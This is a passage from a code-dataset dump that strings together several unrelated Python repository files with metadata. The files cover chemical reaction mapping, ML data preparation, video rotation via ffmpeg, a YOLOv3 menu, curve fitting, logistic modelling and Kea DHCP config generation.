cleanmol+=[comb[1] for comb in mappedlist]\n mappedsmiles=tuple(mappedsmiles)\n cleanmol=tuple(cleanmol)\n unmappedsmiles=tuple([mixsmiles for mixsmiles in rsmilesfreq for k in range(int(Counter(rsmilesfreq[mixsmiles])[ID0])) if mixsmiles in Rdata[ID0]['smiles'] if mixsmiles not in rmixtures[ID0]])\n LHSdata[ID0]['mappedsmiles'].extend([mappedsmiles])\n LHSdata[ID0]['cleanmol'].extend([cleanmol])\n LHSdata[ID0]['unmappedmix'].extend([unmappedsmiles])\n lb=copy.deepcopy(ub)\n LHSdata[ID0]['count']=count\n if removeunmapped:\n rem=Counter()\n Rspecies=Counter([ID0 for ID0 in Rdata for _ in range(Rdata[ID0]['count'])])\n LHSspecies=Counter([ID0 for ID0 in LHSdata for _ in range(LHSdata[ID0]['count'])])\n rem.update(Rspecies)\n rem.subtract(LHSspecies)\n # removedmandrcts=[ID0 for ID0 in rem if ID0 in mandrcts if ID0 not in LHSspecies]\n # removedrcts=[ID0 for ID0 in rem if ID0 not in removedmandrcts if ID0 not in smilesmismatch if ID0 in Rspecies if ID0 not in LHSspecies]\n removedrcts=[ID0 for ID0 in rem if ID0 in Rspecies if ID0 not in LHSspecies if ID0 not in smilesmismatch]\n removedmandrcts=[ID0 for ID0 in removedrcts if ID0 in mandrcts]\n #New\n removedmandrcts=list(set(removedmandrcts).union({mandrct for mandrct in 
mandrcts if mandrct not in LHSspecies}))\n #New\n runmapped=[ID0 for ID0 in rem if rem[ID0]>0 if ID0 not in removedrcts if ID0 not in smilesmismatch] #!=0\n if removedmandrcts:\n msgr+=['Mandatory species unmapped from LHS: '+', '.join([str(ID) for ID in removedmandrcts])]\n removedrcts=[ID0 for ID0 in removedrcts if ID0 not in removedmandrcts]\n if removedrcts:\n msgr+=['Unmapped species from LHS: '+', '.join([str(ID) for ID in removedrcts])]\n if runmapped:\n msgr+=['Unmapped species instances from LHS: '+', '.join([str(ID) for ID in runmapped])]\n if Pdata:\n # breakpoint()\n psmilesfreq=gensmilesfreq(Pdata)\n smilesmismatch=[]\n pmixtures={}\n mismatch=False\n for ID,prod in enumerate(cleanrxn.GetProducts()):\n mappedmol=rdrxn.GetProducts()[ID]\n # formula=rdkit.Chem.rdMolDescriptors.CalcMolFormula(prod)\n if removeunmapped:\n if any([atom.HasProp('molAtomMapNumber') for atom in mappedmol.GetAtoms()]): #Confirmed, mapped reactant\n RHSdata,pmixtures,msg_,ID0=updatespecdict(Pdata,psmilesfreq,prod,mappedmol,updateddict=RHSdata,mixtures=pmixtures,updateall=updateall)\n if msg_!='Valid':\n # if ID0 not in smilesmismatch:\n # smilesmismatch+=[ID0]\n mismatch=True\n else:\n RHSdata,pmixtures,msg_,ID0=updatespecdict(Pdata,psmilesfreq,prod,mappedmol,updateddict=RHSdata,mixtures=pmixtures,updateall=updateall)\n if msg_!='Valid':\n # if ID0 not in smilesmismatch:\n # smilesmismatch+=[ID0]\n mismatch=True\n if mismatch:\n smilesmismatch=[ID0 for ID0 in Pdata if ID0 not in RHSdata and ID0 not in pmixtures]\n if smilesmismatch:\n msgp+=['Smiles discrepancy for RHS species: '+', '.join([str(ID) for ID in smilesmismatch])]\n else:\n msgp+=['Smiles discrepancy for RHS species']\n if pmixtures:\n msgp+=['Mixture detected for RHS species: '+','.join([str(ID) for ID in pmixtures])]\n # breakpoint()\n for ID0 in pmixtures:\n localcounts=[int(Counter(psmilesfreq[mixsmiles])[ID0]) for mixsmiles in pmixtures[ID0]]\n numinsts=[len(pmixtures[ID0][mixsmiles]) for mixsmiles in pmixtures[ID0]]\n lb=[0 for j in range(len(numinsts))]\n ub=[0 for j in range(len(numinsts))]\n div=[int(ceil(numinst/localcount)) for numinst,localcount in zip(numinsts,localcounts)]\n count=max(div)\n if updateall:\n RHSdata[ID0].update({'mappedsmiles':[],'cleanmol':[],'unmappedmix':[]})\n for i in range(count):\n mappedsmiles=[]\n unmappedsmiles=[]\n cleanmol=[]\n for j,mixsmiles in enumerate(pmixtures[ID0]):\n ub_=min(numinsts[j],localcounts[j])\n ub[j]=ub_+lb[j]\n mappedlist=pmixtures[ID0][mixsmiles][lb[j]:ub[j]]\n mappedsmiles+=[comb[0] for comb in mappedlist]\n cleanmol+=[comb[1] for comb in mappedlist]\n mappedsmiles=tuple(mappedsmiles)\n cleanmol=tuple(cleanmol)\n unmappedsmiles=tuple([mixsmiles for mixsmiles in psmilesfreq for k in range(int(Counter(psmilesfreq[mixsmiles])[ID0])) if mixsmiles in Pdata[ID0]['smiles'] if mixsmiles not in pmixtures[ID0]])\n RHSdata[ID0]['mappedsmiles'].extend([mappedsmiles])\n RHSdata[ID0]['cleanmol'].extend([cleanmol])\n RHSdata[ID0]['unmappedmix'].extend([unmappedsmiles])\n lb=copy.deepcopy(ub)\n RHSdata[ID0]['count']=count\n if removeunmapped:\n rem=Counter()\n Pspecies=Counter([ID0 for ID0 in Pdata for _ in range(Pdata[ID0]['count'])])\n RHSspecies=Counter([ID0 for ID0 in RHSdata for _ in range(RHSdata[ID0]['count'])])\n rem.update(Pspecies)\n rem.subtract(RHSspecies)\n # removedmandprod=[ID0 for ID0 in rem if ID0 in mandprods if ID0 not in RHSspecies]\n # removedprods=[ID0 for ID0 in rem if ID0 not in removedmandprod if ID0 not in smilesmismatch if ID0 in Pspecies if ID0 not in RHSspecies]\n 
removedprods=[ID0 for ID0 in rem if ID0 in Pspecies if ID0 not in RHSspecies if ID0 not in smilesmismatch]\n removedmandprods=[ID0 for ID0 in removedprods if ID0 in mandprods]\n punmapped=[ID0 for ID0 in rem if rem[ID0]>0 if ID0 not in removedprods if ID0 not in smilesmismatch] #!=0\n if removedmandprods:\n msgp+=['Mandatory species unmapped from RHS: '+', '.join([str(ID) for ID in removedmandprods])]\n removedprods=[ID0 for ID0 in removedprods if ID0 not in removedmandprods]\n if removedprods:\n msgp+=['Unmapped species from RHS: '+', '.join([str(ID) for ID in removedprods])]\n if punmapped:\n msgp+=['Unmapped species instances from RHS: '+', '.join([str(ID) for ID in punmapped])]\n msg=msgr+msgp\n if not msg:\n msg='Valid'\n else:\n msg=', '.join(msg)\n return LHSdata,RHSdata,msg\n\ndef gensmilesfreq(specdict,validate=True):\n '''\n Generates smile frequency dictionary (Sometimes species have the same SMILES with different IDs eg. mixture vs pure)\n\n '''\n smilesfreq={}\n for ID0 in specdict:\n specsmiles=specdict[ID0]['smiles']\n specsmiles=specsmiles.split('.')\n for specsmile in specsmiles:\n if validate:\n specsmile=Chem.MolToSmiles(molfromsmiles(specsmile))\n if specsmile in smilesfreq:\n smilesfreq[specsmile].extend([ID0])\n else:\n smilesfreq.update({specsmile:[ID0]})\n return smilesfreq\n\n\ndef updatespecdict(refdict,smilesfreq,cleanmol,mappedmol,updateddict=OrderedDict({}),mixtures={},hcarriers=[],updateall=True):\n '''\n Updates species dictionary based on given reactant and cleaned molecule from a reaction\n hcarriers (list of hydrogen containing species involved in reaction but not mapped)\n '''\n foundmatch=False\n specsmiles=Chem.MolToSmiles(molfromsmiles(Chem.MolToSmiles(cleanmol))) #Ensuring RDKit smiles\n # breakpoint()\n if specsmiles not in smilesfreq:\n ID0=''\n msg='Smiles discrepancy for species'\n else:\n idx=''\n msg='Valid'\n IDlist=smilesfreq[specsmiles]\n mixtures_=['.' 
in refdict[ID0]['smiles'] for ID0 in IDlist]\n if len(IDlist)>1: #Try mixtures first\n pure=[ID0 for i,ID0 in enumerate(IDlist) if not mixtures_[i]] #Pure matches\n if any(mixtures):\n for i,ID0 in enumerate(IDlist):\n if mixtures_[i] and ID0 in mixtures:\n if specsmiles in mixtures[ID0]:\n loccount=len(mixtures[ID0][specsmiles])\n else:\n loccount=0\n if any([len(mixtures[ID0][specsmiles_])>loccount for specsmiles_ in mixtures[ID0]]):\n idx=i\n break\n if not idx and not pure:\n for i,ID0 in enumerate(IDlist):\n if mixtures_[i] and ID0 not in mixtures:\n idx=i\n break\n if not idx and pure:\n for i,ID0 in enumerate(IDlist):\n if not mixtures_[i] and ID0 not in updateddict:\n idx=i\n break\n if not idx:\n idx=0\n else:\n idx=0\n ID0=IDlist[idx]\n #New\n if hcarriers and ID0 not in hcarriers and not any([atom.HasProp('molAtomMapNumber') for atom in mappedmol.GetAtoms()]):\n return updateddict,mixtures,msg,ID0\n #New\n mixture=mixtures_[idx]\n if updateall:\n mappedsmiles=Chem.MolToSmiles(mappedmol)\n if mixture:\n if ID0 not in mixtures:\n updateddict.update({ID0:copy.deepcopy(refdict[ID0])})\n updateddict[ID0]['mixture']=mixture\n mixtures.update({ID0:{specsmiles:[(mappedsmiles,cleanmol)]}})\n elif specsmiles not in mixtures[ID0]:\n mixtures[ID0].update({specsmiles:[(mappedsmiles,cleanmol)]})\n else:\n mixtures[ID0][specsmiles].extend([(mappedsmiles,cleanmol)])\n else:\n if ID0 not in updateddict:\n updateddict.update({ID0:copy.deepcopy(refdict[ID0])})\n updateddict[ID0]['mixture']=mixture\n updateddict[ID0]['count']=1\n updateddict[ID0].update({'mappedsmiles':[mappedsmiles],'cleanmol':[cleanmol]})\n else:\n updateddict[ID0]['count']+=1\n updateddict[ID0]['mappedsmiles'].extend([mappedsmiles])\n updateddict[ID0]['cleanmol'].extend([cleanmol])\n else:\n if mixture:\n if ID0 not in mixtures:\n updateddict.update({ID0:copy.deepcopy(refdict[ID0])})\n updateddict[ID0]['mixture']=mixture\n mixtures.update({ID0:{specsmiles:[()]}})\n elif specsmiles not in mixtures[ID0]:\n mixtures[ID0].update({specsmiles:[()]})\n else:\n mixtures[ID0][specsmiles].extend([()])\n else:\n if ID0 not in updateddict:\n updateddict.update({ID0:copy.deepcopy(refdict[ID0])})\n updateddict[ID0]['mixture']=mixture\n updateddict[ID0]['count']=1\n else:\n updateddict[ID0]['count']+=1\n return updateddict,mixtures,msg,ID0\n\n\ndef updaterxns(analoguerxnsparsed,hc_prod={},analoguerxns=None,ncpus=16,restart=True):\n '''\n Updates reactions if there are unmapped species and balances if there are changes (optional)\n\n '''\n # breakpoint()\n if analoguerxns is not None:\n analoguerxnsparsed=updatecolumns(analoguerxns,analoguerxnsparsed,cols=['Rdata','Rgtdata','Solvdata'])\n if ncpus>1:\n if restart:\n initray(num_cpus=ncpus)\n analoguerxnsparseddis=mpd.DataFrame(analoguerxnsparsed)\n else:\n analoguerxnsparseddis=analoguerxnsparsed\n updatedrxn=analoguerxnsparseddis.apply(updaterxns_,hc_prod=hc_prod,axis=1,result_type='reduce')\n updatedrxn=pd.DataFrame(data=updatedrxn.values,index=updatedrxn.index,columns=['rxncomb'])\n analoguerxnsparsed[['mapped_rxn','confidence','balrxnsmiles','msg','LHS','RHS','hcrct','hcprod','LHSdata','RHSdata','msg1']]=pd.DataFrame(updatedrxn['rxncomb'].tolist(), index=updatedrxn.index)\n return analoguerxnsparsed\n\n\n\ndef updaterxns_(row,hc_prod={}):\n '''\n Updates reactions if there are unmapped species and balances if there are changes (optional). 
Assumes both\n balancerxn, maprxn and checkrxn have all been called already\n\n '''\n # breakpoint()\n msg1=copy.deepcopy(row['msg1'])\n msg=copy.deepcopy(row['msg']) #Balanced output message\n LHSdata=copy.deepcopy(row['LHSdata'])\n RHSdata=copy.deepcopy(row['RHSdata'])\n hcprod=copy.deepcopy(row['hcprod'])\n hcrct=copy.deepcopy(row['hcrct'])\n if 'Rgtdata' in row.keys():\n Rgtdata=row['Rgtdata']\n else:\n Rgtdata={}\n if 'Solvdata' in row.keys():\n Solvdata=row['Solvdata']\n else:\n Solvdata={}\n if 'Rdata' in row.keys():\n mandrcts=row['Rdata']\n else:\n mandrcts=LHSdata\n addedspecies=list(set(LHSdata.keys())-set(mandrcts.keys()))\n # breakpoint()\n storemsg=''\n i=0\n while 'Unmapped' in msg1 or i==0: #Unmapped species exist not reflected\n if 'from RHS' in msg1: #Mandatory products unmapped\n storemsg=msg1\n if 'Smiles discrepancy' in msg1:\n break\n if hcprod is not None:\n hcprod=[hcprod_ for hcprod_ in hcprod if hcprod_ in RHSdata]\n hcrct=[hcrct_ for hcrct_ in hcrct if hcrct_ in LHSdata]\n balrxnsmiles,msg,LHS,RHS,hcrct,hcprod,LHSdata,RHSdata=balancerxn(LHSdata,RHSdata,first=False,Rgtdata=Rgtdata,Solvdata=Solvdata,addedspecies=addedspecies,hc_prod=hc_prod,coefflim=6,mandrcts=mandrcts,usemapper=False,ignoreH=False)\n mappedrxn=maprxn([balrxnsmiles])[0]\n if mappedrxn=='Error':\n mapped_rxn='Error'\n conf='Error'\n msg1='Mapping error'\n break\n else:\n mapped_rxn=mappedrxn.get('mapped_rxn')\n conf=mappedrxn.get('confidence')\n if 'With hydrogen carriers' in msg:\n hcarriers=[int(hcarrier) for hcarrier in msg.split('With hydrogen carriers: ')[1].split(', ')[0].split(',')]\n else:\n hcarriers=[]\n LHSdata,RHSdata,msg1=checkrxn(mapped_rxn,Rdata=LHSdata,Pdata=RHSdata,updateall=True,removeunmapped=True,mandrcts=mandrcts,hcarriers=hcarriers)\n if storemsg:\n if msg1=='Valid':\n msg1=storemsg\n else:\n msg1=storemsg+', '+msg1\n break\n i+=1\n return mapped_rxn,conf,balrxnsmiles,msg,LHS,RHS,hcrct,hcprod,LHSdata,RHSdata,msg1\n\ndef updatecolumns(parent,child,cols=[],config=[],reaxys_update=True):\n# def updatecolumns(parent,child,cols=[],config=[],reaxys_update=False):\n # breakpoint()\n if reaxys_update:\n idxcol=['ReactionID','Instance']\n else:\n idxcol=['ReactionID']\n if (parent.index.names!=idxcol and len(idxcol)>1) or (parent.index.name!=idxcol and len(idxcol)==1):\n if (parent.index.name and None not in parent.index.name) or (parent.index.names and None not in parent.index.names):\n parent.reset_index(inplace=True)\n parent.set_index(idxcol,inplace=True)\n if (child.index.names!=idxcol and len(idxcol)>1) or (child.index.name!=idxcol and len(idxcol)==1):\n if (child.index.name and None not in child.index.name) or (child.index.names and None not in child.index.names):\n child.reset_index(inplace=True)\n child.set_index(idxcol,inplace=True)\n if type(parent)==str:\n parent=pd.read_pickle(parent)\n if type(child)==str:\n child=pd.read_pickle(child)\n child[cols]=copy.deepcopy(parent[cols])\n if config:\n child=child[config]\n return child\n\n","repo_name":"chonghuanzhang/balancing_rxn","sub_path":"chem_balancer/MapRxns.py","file_name":"MapRxns.py","file_ext":"py","file_size_in_byte":26233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"11495316286","text":"import pandas as pd\nfrom app.src.features.feature_engineering import feature_engineering\nfrom app import init_cols\nfrom app.src.utils.utils import load_model_config\nimport pickle\n\n\ndef make_dataset(data, artifacts_path):\n\n \"\"\"\n Función que permite crear el 
dataset usado para el entrenamiento\n del modelo.\n\n Args:\n data (List): Lista con la observación llegada por request.\n artifacts_path (str): Ruta local a los artefactos del modelo\n\n Returns:\n DataFrame. Dataset a inferir.\n \"\"\"\n model_info = load_model_config()\n print(\"---> Getting data\")\n data_df = get_raw_data_from_request(data)\n print(\"---> Transforming data\")\n data_df = transform_data(data_df, artifacts_path, model_info[\"cols_to_remove\"])\n print(\"---> Feature engineering\")\n data_df = feature_engineering(data_df)\n print(\"---> Preparing data for training\")\n data_df = pre_train_data_prep(data_df, artifacts_path)\n\n return data_df.copy()\n\n\ndef get_raw_data_from_request(data):\n\n \"\"\"\n Función para obtener nuevas observaciones desde request\n\n Args:\n data (List): Lista con la observación llegada por request.\n\n Returns:\n DataFrame. Dataset con los datos de entrada.\n \"\"\"\n return pd.DataFrame(data, columns=init_cols)\n\n\ndef transform_data(data_df, artifacts_path, cols_to_remove):\n \"\"\"\n Función que permite realizar las primeras tareas de transformación\n de los datos de entrada.\n\n Args:\n data_df (DataFrame): Dataset de entrada.\n artifacts_path (str): Ruta local a los artefactos del modelo\n cols_to_remove (list): Columnas a retirar.\n\n Returns:\n DataFrame. Dataset transformado.\n \"\"\"\n\n print(\"------> Removing unnecessary columns\")\n data_df = remove_unwanted_columns(data_df, cols_to_remove)\n\n data_df[\"Pclass\"] = data_df[\"Pclass\"].astype(str)\n\n # creando dummies originales\n print(\"------> Encoding data\")\n print(\"---------> Getting encoded columns from MLFlow\")\n # obteniendo las columnas presentes en el entrenamiento desde MLFlow\n with open(f\"{artifacts_path}/encoded_columns.pkl\", \"rb\") as inp:\n enc_cols = pickle.load(inp)\n # columnas dummies generadas en los datos de entrada\n data_df = pd.get_dummies(data_df)\n\n # agregando las columnas dummies faltantes en los datos de entrada\n data_df = data_df.reindex(columns=enc_cols, fill_value=0)\n\n return data_df.copy()\n\n\ndef pre_train_data_prep(data_df, artifacts_path):\n\n \"\"\"\n Función que realiza las últimas transformaciones sobre los datos\n antes del entrenamiento (imputación de nulos)\n\n Args:\n data_df (DataFrame): Dataset de entrada.\n artifacts_path (str): Ruta local a los artefactos del modelo.\n\n Returns:\n DataFrame. Datasets de salida.\n \"\"\"\n data_df = input_missing_values(data_df, artifacts_path)\n\n return data_df.copy()\n\n\ndef input_missing_values(data_df, artifacts_path):\n\n \"\"\"\n Función para la imputación de nulos\n\n Args:\n data_df (DataFrame): Dataset de entrada.\n artifacts_path (str): Ruta local a los artefactos del modelo\n\n Returns:\n DataFrame. Datasets de salida.\n \"\"\"\n\n print(\"------> Inputing missing values\")\n # obtenemos el objeto SimpleImputer desde MLFlow\n print(\"------> Getting imputer from MLFlow\")\n with open(f\"{artifacts_path}/imputer.pkl\", \"rb\") as inp:\n imputer = pickle.load(inp)\n data_df = pd.DataFrame(imputer.transform(data_df), columns=data_df.columns)\n\n return data_df.copy()\n\n\ndef remove_unwanted_columns(df, cols_to_remove):\n \"\"\"\n Función para quitar variables innecesarias\n\n Args:\n df (DataFrame): Dataset.\n cols_to_remove: List(srt). Columnas a eliminar.\n\n Returns:\n DataFrame. 
Dataset.\n \"\"\"\n return df.drop(columns=cols_to_remove)\n","repo_name":"JavierGCLG/Proyecto_CicloDeVida_UEM_TRAIN","sub_path":"app/src/data/predict/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"37648486200","text":"from person import Person\nfrom party import Party\n\nglobal users, parties, user1, user2, user3, user4, party1, party2, party3, party4\n\nuser1 = Person(\"John Peterson\", \"123\")\nuser2 = Person(\"Peter Johnson\", \"321\")\nuser3 = Person(\"Eva Jackson\", \"456\")\nuser4 = Person(\"Jackie Evans\", \"654\")\n\nparty1 = Party(\"Oaks\", 0)\nparty2 = Party(\"Lakes\", 0)\nparty3 = Party(\"Foxes\", 0)\nparty4 = Party(\"Stars\", 0)\n\nusers = [user1, user2, user3, user4]\nparties = [party1, party2, party3, party4]\n","repo_name":"r426/Week_12_Voting_System","sub_path":"globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26354642430","text":"\"\"\"Rotate the video files in a folder\nThis requires `ffmpeg` available in the system path.\n\"\"\"\nimport subprocess\nimport pathlib\nimport argparse\n\n\ndef rotate(files: list[pathlib.Path], out_folder: pathlib.Path,\n speed: str, transpose: int) -> None:\n \"\"\"rotate the video files and generate them into out_folder\n\n Args:\n files (list[pathlib.Path]): The video files to be rotated.\n out_folder (pathlib.Path): Must be an empty folder.\n It will be created if not exists yet.\n speed (str): Usually be one of ultrafast and fast.\n transpose (int): 1 is 90 clock-wise; 2 is 90 counter clock-wise.\n See more in https://ffmpeg.org/ffmpeg-filters.html#toc-transpose-1\n\n Raises:\n FileExistsError: May throw when `out_folder` is not empty or can't\n be made.\n FileNotFoundError: May throw when `files` doesn't exist.\n \"\"\"\n out_folder = out_folder.expanduser()\n out_folder.mkdir(exist_ok=True)\n if not out_folder.exists():\n raise FileExistsError(f\"Fail to create folder {out_folder}\")\n if len(list(out_folder.iterdir())) > 0:\n raise FileExistsError(f\"out_folder is not empty ({out_folder})\")\n for file in files:\n if not file.exists():\n raise FileNotFoundError(f\"{file}\")\n n = len(files)\n print(f\"There're {n} files in total.\")\n for (i, file) in enumerate(files):\n print(f\"Rotating {i+1} of {n}...\")\n out_file = out_folder / file.name\n cmd: list[str] = [\"ffmpeg\", \"-i\", str(file),\n \"-loglevel\", \"fatal\", \"-nostats\", # to be less verbose\n \"-c:v\", \"libx264\",\n \"-preset\", f\"{speed}\",\n \"-vf\", f\"transpose={transpose}\",\n str(out_file)]\n subprocess.run(cmd, check=True)\n print(f\"All {n} files are done.\")\n\n\ndef get_files(x: str) -> list[pathlib.Path]:\n folder = pathlib.Path(x).expanduser()\n if not folder.exists():\n raise FileExistsError(folder)\n\n def isfile_notdot(f: pathlib.Path) -> bool:\n return f.is_file() and f.name[0] != \".\"\n out = list(filter(isfile_notdot, folder.iterdir()))\n out.sort()\n return out\n\n\ndef main() -> None:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-t', '--transpose', type=int, default=2,\n help=\"1 is 90 clock-wise; 2 (default) is 90 counter clock-wise. 
\"\n \"See more in https://ffmpeg.org/ffmpeg-filters.html#toc-transpose-1\")\n parser.add_argument(\n '-s', '--speed', type=str, default=\"ultrafast\",\n help=\"Should be one of fast and ultrafast (default)\")\n parser.add_argument(\n 'ffolder', help=\"The folder contains the video files to be rotated\")\n parser.add_argument(\n 'tfolder', help=\"The folder where the rotated files to be generated into\")\n options = parser.parse_args()\n files = [pathlib.Path(f) for f in get_files(options.ffolder)]\n out_folder = pathlib.Path(options.tfolder)\n rotate(files, out_folder, options.speed, options.transpose)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"shrektan/py-scripts","sub_path":"rotate_video.py","file_name":"rotate_video.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8870554165","text":"import train_original\nimport train_custom\nimport test_original\nimport test_custom\nimport mAP_evaluation\n\n\ndef main():\n print(\"Yolov3 comparison solution!\")\n print(\"Goal of this solution is to make comparison in between 2 object detection algorithms\")\n print(\"Solution compare Yolov3 original version and Yolov3 custom with some general improvements\")\n print(\"\")\n print(\"What do you want to do? (Press 1-8 and enter)\")\n print(\"1-train original algorithm\")\n print(\"2-train custom algorithm\")\n print(\"3-test original algorithm\")\n print(\"4-test custom algorithm\")\n print(\"5-evaluate original algorithm against noised images\")\n print(\"6-evaluate custom algorithm against noised images\")\n choice = input()\n\n if choice == '1':\n train_original.main_train_original()\n elif choice == '2':\n train_custom.main_train_custom()\n elif choice == '3':\n test_original.main_test_original()\n elif choice == '4':\n test_custom.main_test_custom()\n elif choice == '5':\n mAP_evaluation.evaluate(0, 1)\n elif choice == '6':\n mAP_evaluation.evaluate(1, 1)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Deny71/YoloV3_CustomModel","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42055863077","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef _mmq(y, gs, sigs):\n\n D = (1/np.power(sigs, 2)) * np.dot(y, gs.T)\n\n M = (1/np.power(sigs, 2)) * np.dot(gs, gs.T)\n\n covariance_matrix = np.linalg.inv(M)\n\n adjusted_params = np.dot(covariance_matrix, D)\n\n chi_square = np.sum(np.power((1/sigs)*(y - np.dot(adjusted_params.T, gs)), 2))\n\n degrees_of_freedom = gs.shape[1] - gs.shape[0]\n\n return adjusted_params, covariance_matrix, chi_square, degrees_of_freedom\n\nfig, ax = plt.subplots(2, figsize=(20, 15))\n\ndata = pd.read_csv('dados_osciloscópio.tsv', sep='\\t')\ny = data['Tensão (V)']\nt = data['Tempo (s)']\nsigma_y = 0.06 #V\n\nax[0].errorbar(t, y, yerr=[sigma_y]*len(y), fmt='b-')\n\nf = 2 #Hz\n\ng1 = np.cos(2*np.pi*f*t)\ng2 = np.sin(2*np.pi*f*t)\n\ngs = np.array([g1, g2])\n\nparams, cov_mat, chi, ngl = _mmq(y, gs, sigma_y)\n\na1 = params[0]\na2 = params[1]\n\nsigma_a1 = np.sqrt(cov_mat[0,0])\nsigma_a2 = np.sqrt(cov_mat[1,1])\n\ncovariance = cov_mat[0,1]\ncorrelation = covariance/(sigma_a1*sigma_a2)\n\nA = np.sqrt(np.power(a1, 2) + np.power(a2, 2))\n\nda1 = a1*sigma_a1/A\nda2 = a1*sigma_a2/A\n\nsigma_A = np.sqrt( np.power(da1, 2) + np.power(da2, 2) + 2*da1*da2*covariance)\n\nF_t = 
a1*np.cos(2*np.pi*f*t) + a2*np.sin(2*np.pi*f*t)\n\nsigma_F = np.sqrt(np.power(np.cos(2*np.pi*f*t)*sigma_a1, 2) + np.power(np.sin(2*np.pi*f*t)*sigma_a2, 2))\n\nax[0].errorbar(t, F_t, yerr=sigma_F, fmt='r-')\n\nsigma_R = np.sqrt(sigma_y**2 + (sigma_F)**2)\n\nax[1].plot(t, y - F_t, 'o')\nax[1].axhline(y=0, c='black')\n\nplt.show()","repo_name":"PedroHGMachado/tedfe","sub_path":"atividades/atividade24/atividade24.py","file_name":"atividade24.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15371894284","text":"import pandas\nimport statsmodels.formula.api as smf\n\nquantidade_lida = 10000\n\n\ndef ler_arquivo(nome_arquivo):\n csv = pandas.read_csv(\n f\"../dados/micro_dados_{nome_arquivo}.csv\",\n # nrows=quantidade_lida,\n engine=\"c\",\n na_filter=False,\n )\n return csv\n\n\ndef calcular_modelo(csv, nome_arquivo):\n resposta = \"falta ~\"\n resultados = []\n for i, campo in enumerate(campos):\n formula = resposta + \" + \".join(campo)\n resultado_tmp = smf.logit(formula, csv).fit()\n with open(f\"../modelos/{nome_arquivo}_{i+1}.txt\", \"w\") as file:\n file.write(resultado_tmp.summary().as_text())\n file.close()\n resultados.append(resultado_tmp)\n return resultados\n\n\ncampos = [\n [\n \"C(TP_SEXO)\",\n \"C(TP_COR_RACA)\",\n \"salario\",\n \"C(automovel)\",\n \"IDHM\",\n \"PIB\",\n \"densidade\"\n ],\n]\nif __name__ == \"__main__\":\n arquivo = \"2019\"\n csv = ler_arquivo(arquivo)\n calcular_modelo(csv, arquivo)\n","repo_name":"tredeneo/utfpr","sub_path":"ciencias_de_dados/04 - Pesquisa/enem_socio_economico/codigos/modelagem.py","file_name":"modelagem.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"25257477419","text":"'''\n© Anthrino > DHCP configuration file generator\n'''\nimport sys\nimport json\nfrom random import randint\nfrom pprint import pprint\n\n# import configparser\n# parser = configparser.ConfigParser()\n# config = parser.read('/usr/local/etc/kea/kea-dhcp4.conf')\n\n'''Recursive Method to replace IP addressses in json as per pool'''\ndef replace_addr(item, index, indexB, mode):\n\n if isinstance(item, dict):\n new = {}\n for key, val in item.items():\n val = replace_addr(val, index, indexB, mode)\n new[key] = val\n return new\n\n elif isinstance(item, list):\n item = [replace_addr(i, index, indexB, mode) for i in item]\n return item\n\n elif isinstance(item, str):\n if mode == 0:\n return item.replace('192.0.2', '192.0.'+str(index+1))\n else:\n return item.replace('192.1.5', '192.'+str(indexB+1)+'.'+str(index+1))\n\n return item\n\n\ndef process_config(mode, subnet_count, shared_nw_count):\n ''' Load default sample config file '''\n with open('kea-dhcp4-bkp.conf') as def_config:\n conf_str = ''\n for x in def_config.readlines():\n if not x.strip().startswith('//'):\n conf_str += x\n\n def_config = json.loads(conf_str)\n # pprint(config)\n\n ''' Subnet/shared nw templates for generation'''\n subnet_config = def_config['Dhcp4']['subnet4'][0]\n subnet_config_min = def_config['Dhcp4']['shared-networks'][0]['subnet4'][0]\n shared_nw_config = def_config['Dhcp4']['shared-networks'][0]\n\n ''' Initialize empty lists to contain new config'''\n def_config['Dhcp4']['subnet4'] = []\n def_config['Dhcp4']['shared-networks'] = []\n sn_id = 0\n\n ''' Loop to Generate subnets'''\n for i in range(subnet_count % 256):\n # pprint(replace_addr(subnet_config, i))\n sn_id += 1\n 
new_subnet = replace_addr(subnet_config, i, 0, 0)\n new_subnet['id'] = sn_id\n def_config['Dhcp4']['subnet4'].append(new_subnet)\n\n ''' Loop to generate shared nws'''\n for i in range(shared_nw_count % 256):\n shared_nw_config['subnet4'] = []\n for j in range(randint(1, 5)):\n sn_id += 1\n new_subnet = replace_addr(subnet_config_min, j, i, 1)\n new_subnet['id'] = sn_id\n shared_nw_config['subnet4'].append(new_subnet)\n shared_nw_config['name'] = 'subnet-cluster'+str(i+1)\n # print(i ,[(x['id'], x['subnet']) for x in shared_nw_config['subnet4']])\n\n def_config['Dhcp4']['shared-networks'].append(dict(shared_nw_config))\n def_config['Dhcp4']['shared-networks']\n # for y in def_config['Dhcp4']['shared-networks']:\n # print(i ,[(x['id'], x['subnet']) for x in y['subnet4']])\n\n if mode == 0:\n ''' Print generated config'''\n pprint(def_config)\n # print()\n\n elif mode == 1:\n ''' Write generated config to file'''\n with open('/usr/local/etc/kea/kea-dhcp4.conf', 'w') as file:\n json.dump(def_config, file)\n\n else:\n ''' Dislpay exisitng config file'''\n with open('/usr/local/etc/kea/kea-dhcp4.conf', 'r') as file:\n pprint(json.loads(file.read()))\n\n\nif __name__ == '__main__':\n ''' Read command line args [mode, subnet_count, shared_nw_count] and call processor'''\n process_config(int(sys.argv[1]), int(sys.argv[2]), 